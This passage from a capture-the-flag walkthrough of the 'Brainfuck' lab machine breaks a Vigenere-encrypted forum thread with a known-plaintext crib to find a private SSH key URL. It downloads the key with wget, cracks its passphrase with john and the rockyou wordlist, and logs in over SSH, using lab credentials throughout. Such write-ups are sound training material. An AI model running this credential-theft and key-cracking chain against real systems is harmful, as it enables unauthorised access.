5 :443 sup3rs3cr3t.brainfuck.htb

# we can login using orestis:kIEnnfEKJ#9UmdO

# 2 new posts
https://sup3rs3cr3t.brainfuck.htb/d/2-ssh-access/4
admin: SSH Access was upgraded to make use of keys. Password login is permanently disabled.
admin: You little shit, still no manners I see... You want me to paste it here for all members to download?
orestis: Go fuck yourself admin, I am locked out!! send me my key asap! Orestis - Hacking for fun and profit
orestis: I am opening up an encrypted thread. Talk to you there! Orestis - Hacking for fun and profit

https://sup3rs3cr3t.brainfuck.htb/d/3-key/5
orestis: Mya qutf de buj otv rms dy srd vkdof :) Pieagnm - Jkoijeg nbw zwx mle grwsnn
admin: Xua zxcbje iai c leer nzgpg ii uy...
orestis: Ufgoqcbje.... Wejmvse - Fbtkqal zqb rso rnl cwihsf
admin: Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec J uovg :) mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr
orestis: Si rbazmvm, Q'yq vtefc gfrkr nn ;) Qbqquzs - Pnhekxs dpi fca fhf zdmgzt

# definitely encrypted; note that orestis signs every message with "Orestis - Hacking for fun and profit", which gives us a known-plaintext crib:
Orestis - Hacking for fun and profit
Pieagnm - Jkoijeg nbw zwx mle grwsnn
Wejmvse - Fbtkqal zqb rso rnl cwihsf
Qbqquzs - Pnhekxs dpi fca fhf zdmgzt

# the same plaintext letter encrypts to a different letter at each occurrence, so it is not a Caesar (single-shift) cipher; a polyalphabetic cipher such as Vigenere is likely

# explanation for recovering the key (and from it the PT) from the crib
each PT letter's unicode value - 97 (unicode of 'a') = X, its position in the alphabet (0-25)
encrypted letter - X (mod 26) = key letter, e.g. D - 2 = B

# automation: recover the key stream from the signature (letters only, spaces and punctuation stripped)
plaintext = "OrestisHackingforfunandprofit"
ciphertext = "PieagnmJkoijegnbwzwxmlegrwsnn"
key = ""

for i in range(len(plaintext)):
    # key letter = (ciphertext - plaintext) mod 26, shifted back into the 'a'..'z' range
    num_key = ((ord(ciphertext[i]) - ord(plaintext[i])) % 26) + 97
    char_key = chr(num_key)
    key = key + char_key

print(key)

$ python3 vigenere-exploit.py
brainfuckmybrainfuckmybrainfu

# the key stream repeats every 11 letters; once we have the key fuckmybrain, use it to decode the thread at
https://www.dcode.fr/vigenere-cipher
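As an added example (not part of the original notes), the same key recovery followed by a decrypt of the full first message, so the dcode.fr step can be reproduced offline. The key stream advances only on letters, which is why the 11-letter period reads "brainfuckmy" when aligned to the signature and as the rotation "fuckmybrain" when aligned to the start of the message:

```python
# Added example, not code from the original notes. Sample strings below are
# the thread's own ciphertext and the plaintext recovered above.
from itertools import cycle

A, a = ord("A"), ord("a")


def recover_key(plaintext: str, ciphertext: str) -> str:
    """Key letter = (C - P) mod 26 for each aligned letter pair; non-letters are skipped."""
    key = []
    for p, c in zip(plaintext, ciphertext):
        if p.isalpha() and c.isalpha():
            key.append(chr((ord(c.lower()) - ord(p.lower())) % 26 + a))
    return "".join(key)


def shortest_period(key_stream: str) -> str:
    """Smallest prefix whose repetition reproduces the recovered key stream."""
    for n in range(1, len(key_stream) + 1):
        candidate = key_stream[:n]
        if all(key_stream[i] == candidate[i % n] for i in range(len(key_stream))):
            return candidate
    return key_stream


def vigenere(text: str, key: str, decrypt: bool) -> str:
    """Shift letters by the key; case is kept and non-letters do not consume key."""
    keystream = cycle(key.lower())
    out = []
    for ch in text:
        if not ch.isalpha():
            out.append(ch)  # spaces, ':)', '-' and URL punctuation pass through
            continue
        k = ord(next(keystream)) - a
        base = A if ch.isupper() else a
        shift = -k if decrypt else k
        out.append(chr((ord(ch) - base + shift) % 26 + base))
    return "".join(out)


if __name__ == "__main__":
    stream = recover_key("OrestisHackingforfunandprofit", "PieagnmJkoijegnbwzwxmlegrwsnn")
    print(stream, "->", shortest_period(stream))
    msg = "Mya qutf de buj otv rms dy srd vkdof :) Pieagnm - Jkoijeg nbw zwx mle grwsnn"
    print(vigenere(msg, "fuckmybrain", decrypt=True))
```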

# PT conversation between orestis <> admin

orestis: Hey give me the url for my key bitch :) Orestis - Hacking for fun and profit
admin: Say please and i just might do so...
orestis: Pleeeease.... Orestis - Hacking for fun and profit
admin: There you go you stupid fuck, I hope you remember your key password because I dont :) https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
orestis: No problem, I'll brute force it ;) Orestis - Hacking for fun and profit

# downloading the ssh private key
$ wget --no-check-certificate https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa

# brute-forcing the key passphrase using john
$ /usr/share/john/ssh2john.py id_rsa > ssh.hash

$ john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
Created directory: /home/kashz/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
3poulakia!       (id_rsa)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:01 DONE (2021-10-01 21:24) 0.5494g/s 7880Kp/s 7880Kc/s 7880KC/sa6_123..*7¡Vamos!
Session completed


$ ssh -i id_rsa orestis@10.10.10.17
Enter passphrase for key 'id_rsa':

orestis@brainfuck:~$ whoami;id;hostname
orestis
uid=1000(orestis) gid=1000(orestis) groups=1000(orestis),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare)
brainfuck
